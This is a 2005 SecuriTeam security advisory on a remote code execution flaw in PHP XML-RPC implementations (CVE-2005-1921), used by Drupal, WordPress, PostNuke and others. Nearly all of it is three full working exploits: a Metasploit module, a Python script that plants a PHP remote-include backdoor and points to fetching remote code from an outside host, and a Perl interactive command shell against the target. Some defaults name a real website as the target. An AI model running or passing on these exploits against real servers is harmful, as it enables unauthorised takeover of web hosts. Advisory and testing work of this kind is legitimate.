[EXPL] XMLRPC Remote Commands Execution (Multiple Exploits)

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  XMLRPC Remote Commands Execution (Multiple Exploits)
------------------------------------------------------------------------


SUMMARY

Lack of parameter filtering by the xmlrpc.php script allows a remote 
attacker to cause the script to execute arbitrary code. The following 
exploit codes can be used to test your system for the mentioned 
vulnerability.

DETAILS

Exploit #1:
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::php_xmlrpc_eval;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
'Name' => 'PHP XML-RPC Arbitrary Code Execution',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'RPATH' => [1, 'DATA', 'Path to the XML-RPC script', '/xmlrpc.php'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits an arbitrary code execution flaw discovered in many
implementations of the PHP XML-RPC module. This flaw is exploitable 
through
a number of PHP web applications, including but not limited to Drupal, 
Wordpress,
Postnuke, and TikiWiki.
}),

'Refs' =>
[
['BID', '14088'],
['CVE', '2005-1921'],
],

'Payload' =>
{
'Space' => 512,
'Keys' => ['cmd', 'cmd_bash'],
},

'Keys' => ['xmlrpc'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, 
@_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $path = $self->GetVar('RPATH');
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;

# Encode the command as a set of chr() function calls
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

# Create the XML-RPC post data
my $data =
'<?xml version="1.0"?>'.
"<methodCall><methodName>" . 
Pex::Text::AlphaNumText(int(rand(128)+32))."</methodName>".
"<params><param><name>" . 
Pex::Text::AlphaNumText(int(rand(128)+32))."');".
"echo('_cmd_beg_\n');".
"passthru($byte);".
"echo('_cmd_end_\n');".
";//</name><value>".
Pex::Text::AlphaNumText(int(rand(128)+32)).
"</value></param></params></methodCall>";

my $req =
"POST $path HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"Content-Type: application/xml\r\n".
"Content-Length: ". length($data)."\r\n".
"Connection: Close\r\n".
"\r\n". $data . "\r\n";

my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}

$self->PrintLine("[*] Sending the malicious XML-RPC POST request...");

$s->Send($req);

my $results = $s->Recv(-1, 20);
$s->Close();

if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
my $out = $1;
$out =~ s/^\s+|\s+$//gs;
if ($out) {
$self->PrintLine('----------------------------------------');
$self->PrintLine('');
$self->PrintLine($out);
$self->PrintLine('');
$self->PrintLine('----------------------------------------');
}
}

return;
}

1;

#EoF

Exploit #2:
#!/usr/bin/python

# ./xmlrpc.py [chk|xpl] host uri
# example (check bug): ./xmlrpc.py chk www.postnuke.com /xmlrpc.php
# example (exploit bug): ./xmlrpc.py xpl www.postnuke.com /xmlrpc.php
# Pear XML-RPC Library 1.3.0 Remote PHP Code Execution Exploit -- Not 
working for me
# so i made this python code
# http://pear.php.net/bugs/bug.php?id=4692
# Bug #4692 Remote Code Exection In XML RPC Server
# xmlrpc.pl http://pathtoxmlrpc/server
# "id;pwd;uname -a;uptime"
# [*] Sending command id;pwd;uname -a;uptime
# [*] Command sent, waiting for response
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# /var/www/drupal
# Linux cacophony 2.4.18-bf2.4 Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
# 23:27:22 up 5 days, 9:05, 0 users, load average: 0.12, 0.16, 0.21
# http://www.postnuke.com/xmlrpc.php
# by k3rn3lp4nic. greetz: albanian security clan!!! july 2005

import sys, httplib

try:
    chose = sys.argv[1]
except IndexError:
    chose = 'chk'

try:
    host = sys.argv[2]
except IndexError:
    host = 'www.postnuke.com'

try:
    uri = sys.argv[3]
except IndexError:
    uri = '/xmlrpc.php'


def check():
    SoapMessage = """<?xml version="1.0"?>
    <methodCall>
    <methodName>test.method</methodName>
        <params>
            <param>
            <value><name>','')); phpinfo(); exit;/*</name></value>
            </param>
        </params>
    </methodCall>
    """

    webservice = httplib.HTTP("%s" % host)
    webservice.putrequest("POST", "%s" % uri)
    webservice.putheader("Host", "%s" % host)
    webservice.putheader("User-Agent", "xmlrpc exploit R/1.1 postnuke 
k3rn37p4nic")
    webservice.putheader("Content-type", "application/xml")
    webservice.putheader("Content-length", "%d" % len(SoapMessage))
    webservice.endheaders()
    webservice.send(SoapMessage)

    # get the response

    statuscode, statusmessage, header = webservice.getreply()
    print "Response: ", statuscode, statusmessage
    print "headers: ", header
    res = webservice.getfile().read()
    print res
    print 'If you see phpinfo dump data the you are succeful. proceed with 
xpl!'

def xpl():

    SoapMessage = """<?xml version="1.0"?>
    <methodCall>
    <methodName>test.method</methodName>
        <params>
            <param>
            <value><name>',''));
    echo 'start';
    passthru('del xmlrpcpy.php');
    $filename = 'xmlrpcpy.php';
    $somecontent = '%?php include(~inc); ?#';
    $somecontent = eregi_replace('%', chr(60), $somecontent);
    $somecontent = eregi_replace('~', chr(36), $somecontent);
    $somecontent = eregi_replace('#', chr(62), $somecontent);
    $handle = fopen($filename,'w');
    fwrite($handle, $somecontent);
    fclose($handle);

    passthru('dir');

    passthru('type xmlrpcpy.php');

    echo 'done';
    exit;
    /*</name></value>
            </param>
        </params>
    </methodCall>
    """

    webservice = httplib.HTTP("%s" % host)
    webservice.putrequest("POST", "%s" % uri)
    webservice.putheader("Host", "%s" % host)
    webservice.putheader("User-Agent", "xmlrpc exploit R/1.1 postnuke 
k3rn37p4nic")
    webservice.putheader("Content-type", "application/xml")
    webservice.putheader("Content-length", "%d" % len(SoapMessage))
    webservice.endheaders()
    webservice.send(SoapMessage)

    # get the response

    statuscode, statusmessage, header = webservice.getreply()
    print "Response: ", statuscode, statusmessage
    print "headers: ", header
    res = webservice.getfile().read()
    print res
    print '\n\nExploit Successful!!!\n' . 'Download 
http://www.suneworld.com/programs/webexplorer20.zip'
    print 'Rename index.php3 to index.txt and put it to some public host 
http://somehost.com/index.txt'
    print 'Now Accessed it like this: '
    print 'http://victimhost/postnukewhatever/' . 
'xmlrpcpy.php?inc=http://somehost.com/index.txt'
    print 'Then upload your favorite haxor tools! Bye. Stay healthy!'

if __name__ == "__main__":
    print 'xmlrpc exploit R/1.1 4 postnuke by k3rn37p4nic'
    print 'revised it if you can! ver jul 2005'
    print 'Greetz: Albanian Security Clan!!!'
    print '---------------------------------------------'
    print './xmlrpc.py [chk|xpl] host uri'
    print 'example (check bug): ./xmlrpc.py chk www.postnuke.com 
/xmlrpc.php'
    print 'example (exploit bug): ./xmlrpc.py xpl www.postnuke.com 
/xmlrpc.php'
    if chose=='chk':
        check()
    elif chose=='xpl':
        xpl();
    else:
        print 'Boom! Script Kiddie'

#EoF

Exploit #3:
#!/usr/bin/perl
#
# ilo--
#
# This program is no GPL or has nothing to do with FSF, but some
# code was ripped from romansoft.. sorry, too lazy!
#
# xmlrpc bug by James from GulfTech Security Research.
# http://pear.php.net/bugs/bug.php?id=4692
# xmlrpc drupal exploit, but James sais xoops, phpnuke and other
# cms should be vulnerable.
#
# greets: !dSR digitalsec.net
#
require LWP::UserAgent;
use URI;
use Getopt::Long;
use strict;
$| = 1; # fflush stdout after print

# Default options
# connection
my $basic_auth_user = '';
my $basic_auth_pass = '';
my $proxy = '';
my $proxy_user = '';
my $proxy_pass = '';
my $conn_timeout = 15;

# general
my $host;
 
 #informational lines to feed my own ego.
 print "xmlrpc exploit - http://www.reversing.org \n";
 print "2005 ilo-- <ilo".chr(64)."reversing.org> \n";
 print "special chars allowed are / and - \n\n";

 # read command line options
 my $options = GetOptions (

 #general options
 'host=s' => \$host, # input host to test.

 # connection options
 'basic_auth_user=s' => \$basic_auth_user,
 'basic_auth_pass=s' => \$basic_auth_pass,
 'proxy=s' => \$proxy,
 'proxy_user=s' => \$proxy_user,
 'proxy_pass=s' => \$proxy_pass,
 'timeout=i' => \$conn_timeout);

 # command line sanity check
 &show_usage unless ($host);

 # main loop
 while (1){
 print "\nxmlrpc@# ";
 my $cmd = <STDIN>;
 xmlrpc_xploit ($cmd);
 }

 exit (1);

#exploit
sub xmlrpc_xploit {
chomp (my $data = shift);
my $reply;

my $d1 = "<?xml version=\"1.0\"?><methodCall>". "<methodName>". 
"examples.getStateName</methodName>" . "<params><param><name>a');";
my $d2 = ";//</name><value>xml exploit 
R/01</value></param></params></methodCall>";

 $data =~ s/-/'.chr(45).'/mg;
 $data =~ s/\//'.char(47).'/mg;

 my $req = new HTTP::Request 'POST' => $host;
 $req->content_type('application/xml');
 $req->content($d1.'system(\''.$data.'\')'.$d2);
 
 my $ua = new LWP::UserAgent;
 $ua->agent("xmlrpc exploit R/0.1");
 $ua->timeout($conn_timeout);

 if ($basic_auth_user){
  $req->authorization_basic($basic_auth_user, $basic_auth_pass)
 }
 if ($proxy){
  $ua->proxy(['http'] => $proxy);
  $req->proxy_authorization_basic($proxy_user, $proxy_pass);
 }
 
 #send request, return null if not OK
 my $res = $ua->request($req);
 if ($res->is_success){
   $reply= $res->content;
 } else {
   $reply = "";
 }
 $reply =~ /(.*).(<pre>warning.*)/mgsi;
 print ($1);
}

# show options
sub show_usage {
 print "Syntax: ./xmlrpc.pl [options] host/uri\n\n";
 print "main options\n";
 print "connection options\n";
 print "\t--proxy (http), --proxy_user, --proxy_pass\n";
 print "\t--basic_auth_user, --basic_auth_pass\n";
 print "\t--timeout \n";
 print "\nExample\n";
 print "bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \n";
 print "\n";
 exit(1);
}
#Eof


ADDITIONAL INFORMATION

The information has been provided by  <mailto:crg@digitalsec.net> Crg and  
<mailto:hdm@metasploit.com> H D Moore.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.